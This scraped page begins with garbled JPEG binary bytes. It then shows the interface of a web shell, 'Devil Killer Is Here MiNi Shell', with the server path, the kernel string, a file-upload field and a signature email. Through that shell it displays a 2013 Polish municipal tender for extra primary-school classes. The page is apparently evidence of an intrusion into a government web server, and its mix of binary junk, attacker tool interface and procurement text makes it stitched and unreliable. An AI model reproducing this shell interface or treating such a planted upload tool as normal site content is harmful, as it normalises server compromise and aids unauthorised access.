JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/57742-N-2013.html

<p class="kh_header"><b>Ostrów Wielkopolski: Usługi edukacyjne obejmujące przeprowadzenie dodatkowych zajęć w Szkole Podstawowej Nr 11 w Ostrowie Wielkopolskim przy ul. Batorego 2, w ramach projektu systemowego pn. Od dziś pracuję na swój sukces w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych</b><br>
<b>Numer ogłoszenia: 57742 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Ostrów Wielkopolski , Aleja Powstańców Wielkopolskich 18, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 5822400, 7366241, faks 062 5918206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrow-wielkopolski.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące przeprowadzenie dodatkowych zajęć w Szkole Podstawowej Nr 11 w Ostrowie Wielkopolskim przy ul. Batorego 2, w ramach projektu systemowego pn. Od dziś pracuję na swój sukces w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi edukacyjne obejmujące przeprowadzenie dodatkowych zajęć w Szkole Podstawowej Nr 11 w Ostrowie Wielkopolskim przy ul. Batorego 2, w ramach projektu systemowego pn. Od dziś pracuję na swój sukces w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Opis przedmiotu zamówienia 

Przedmiot zamówienia podzielono na IX części:
 
I część:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji dla 15 uczniów w wymiarze 90 godzin prowadzone przez 2 nauczycieli, zgodnie z podziałem:
a)	klasy III i klasy II - 60 godzin - dla 10 uczniów - 1 nauczyciel, 
b)	klasy I - 30 godzin - dla 5 uczniów - 1 nauczyciel. 

II część:
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy dla 12 uczniów 
w wymiarze 90 godzin  prowadzone przez 1 nauczyciela, zgodnie z podziałem: 
a)	klasy III - 30 godzin - dla 4 uczniów, 
b)	klasy II - 30 godzin - dla 4 uczniów, 
c)	klasy I - 30 godzin - dla 4 uczniów.

III część:
Zajęcia z gimnastyki korekcyjnej wraz z elementami pływania dla dzieci z wadami postawy dla 15 uczniów w wymiarze 90 godzin prowadzone przez 1 nauczyciela, zgodnie z podziałem:


a)	klasy III - 30 godzin - dla 5 uczniów, 
b)	klasy II - 30 godzin - dla 5 uczniów, 
c)	klasy I - 30 godzin - dla 5 uczniów.

IV część:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych matematycznie dla 30 uczniów w wymiarze 120 godzin prowadzone przez 2 nauczycieli, zgodnie z podziałem:
a)	klasy III - 40 godzin - dla 10 uczniów - 1 nauczyciel, 
b)	klasy II i klasy I - 80 godzin dla 20 uczniów - 1 nauczyciel.

V część:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie dla 26 uczniów w wymiarze 60 godzin prowadzone przez 1 nauczyciela, zgodnie 
z podziałem:
a)	klasy III - 30 godzin - dla 10 uczniów, 
b)	klasy II i klasy I - 30 godzin - dla 16 uczniów.

VI część:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych muzycznie 
dla 24 uczniów w wymiarze 60 godzin prowadzone przez 1 nauczyciela, zgodnie 
z podziałem:
a)	klasy III - 30 godzin - dla 8 uczniów,
b)	klasy II i klasy I - 30 godzin - dla 16 uczniów.

VII część:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych tanecznie 
dla 24 uczniów w wymiarze 90  godzin prowadzone przez 1 nauczyciela, zgodnie z podziałem:
a)	klasy III - 30 godzin - dla 8 uczniów,
b)	klasy II - 30 godzin - dla 8 uczniów,
c)	klasy I - 30 godzin - dla 8 uczniów.

VIII część:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych językowo 
w zakresie języka angielskiego dla 22 uczniów w wymiarze 90  godzin prowadzone przez 
1 nauczyciela, zgodnie z podziałem:
a)	klasy III - 30 godzin - dla 8 uczniów,
b)	klasy II - 30 godzin - dla 8 uczniów,
c)	klasy I - 30 godzin - dla 6 uczniów.

IX część:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych teatralnie 
dla 24 uczniów w wymiarze 90  godzin prowadzone przez 2 nauczycieli, zgodnie 
z podziałem:
a)	klasy III - 30 godzin - dla 8 uczniów - 1 nauczyciel, 
b)	klasy II i klasy I - 60 godzin - dla 16 uczniów - 1 nauczyciel.


3.2. Dodatkowe uwarunkowania:
1.	Przez jednostkę 1 godzina używaną w SIWZ zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 listopada 2010 roku w sprawie zasad udzielania i organizacji pomocy psychologiczno - pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz.U. 2010.228.1487) §13 ust. 1 - rozumie się:
a) 45 minut - dla zajęć rozwijających uzdolnienia oraz zajęć dydaktyczno-wyrównawczych,
b) 60 minut - dla zajęć specjalistycznych.
2.	Wykonawca przed podpisaniem umowy zobowiązany jest do dostarczenia zaakceptowanego i podpisanego przez dyrektora szkoły autorskiego programu nauczania.
3.	Wykonawca przed podpisaniem umowy zobowiązany jest do dostarczenia zaakceptowanego i podpisanego przez dyrektora szkoły harmonogramu zajęć. 
4.	Wszelkie ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą 
z dyrektorem szkoły. 
5.	Wykonawca jest odpowiedzialny za jakość oraz zgodność z warunkami technicznymi 
i jakościowymi przedmiotu zamówienia
6.	Podczas realizacji zamówienia wykonawca zobowiązany jest do realizacji przedmiotu zamówienia z należytą starannością, zgodnie z art. 355 Kodeksu cywilnego.
7.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia. 
Zajęcia będą prowadzone przy wykorzystaniu posiadanych przez szkołę pomocy 
i środków dydaktycznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest wymagane wniesienie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że dysponuje osobami do prowadzenia zająć, z których:
a)	w odniesieniu do I części zamówienia każda posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej bądź kwalifikacje do prowadzenia terapii pedagogicznej, zajęć korekcyjno-kompensacyjnych lub ukończoną oligofrenopedagogikę oraz jest nauczycielem przynajmniej kontraktowym,
b)	w odniesieniu do II części zamówienia każda posiada wykształcenie przynajmniej wyższe z przygotowaniem pedagogicznym oraz kwalifikacje do prowadzenia zajęć logopedycznych oraz jest nauczycielem przynajmniej kontraktowym,
c)	w odniesieniu do III części zamówienia każda posiada wykształcenie przynajmniej wyższe z przygotowaniem pedagogicznym oraz kwalifikacje do prowadzenia gimnastyki korekcyjnej oraz jest nauczycielem przynajmniej kontraktowym,
d)	w odniesieniu do IV części zamówienia każda posiada wykształcenie przynajmniej wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej  lub kwalifikacje do prowadzenia zajęć szachowych oraz jest nauczycielem przynajmniej kontraktowym,
e)	w odniesieniu do V części zamówienia każda posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej lub plastyki oraz jest nauczycielem przynajmniej kontraktowym,
f)	w odniesieniu do VI części zamówienia każda posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej oraz jest nauczycielem przynajmniej kontraktowym,
g)	w odniesieniu do VII części zamówienia każda posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej oraz jest nauczycielem przynajmniej kontraktowym,
h)	w odniesieniu do VIII części zamówienia każda posiada wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania języków obcych przynajmniej w klasach I - III  oraz jest nauczycielem przynajmniej kontraktowym,
i)	   w odniesieniu do IX części zamówienia każda posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej oraz jest nauczycielem przynajmniej kontraktowym.

	Ocena spełnienia warunku zostanie dokonana wg formuły spełnia / nie spełnia, 	na podstawie złożonych wraz z ofertą oświadczeń, o których mowa w pkt 7.1. i 7.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. w formie oryginału pisemne zobowiązanie lub inne oświadczenie podmiotów, które oddają do dyspozycji wykonawcy składającemu ofertę niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.
2. w przypadku złożenia oferty przez podmioty występujące wspólnie dokumenty wymienione w pkt III.4.1. na spełnienie warunków, o których mowa w pkt III.3. mogą zostać złożone wspólnie, natomiast dokumenty wymienione w pkt III.4.2. potwierdzające brak podstaw do wykluczenia, składa oddzielnie każdy z podmiotów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod rygorem      nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności z regulacjami zawartymi w ustawie Prawo zamówień publicznych.
II.	Strony dokonają zmian umowy w zakresie: 
1)	warunków płatności w przypadku nieterminowego przekazania transzy dofinansowania projektu Od dziś pracuję na swój sukces,
2)	wykonania przez strony świadczeń wynikających z umowy w przypadku zmiany przepisów prawa powszechnie obowiązującego jeżeli ma to wpływ na zakres lub warunki wykonania tych świadczeń.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ostrow-wielkopolski.um.gov.pl/cache/15//1124/1216/6353/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ostrowie Wielkopolskim, al. Powstańców Wielkopolskich 18, Referat Zamówień Publicznych, pokój 324 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 13:00, miejsce: Urząd Miejski w Ostrowie Wielkopolskim, al. Powstańców Wielkopolskich 18, Referat Zamówień Publicznych, pokój 324 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn. Od dziś pracuję na swój sukces realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki i współfinansowany jest z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com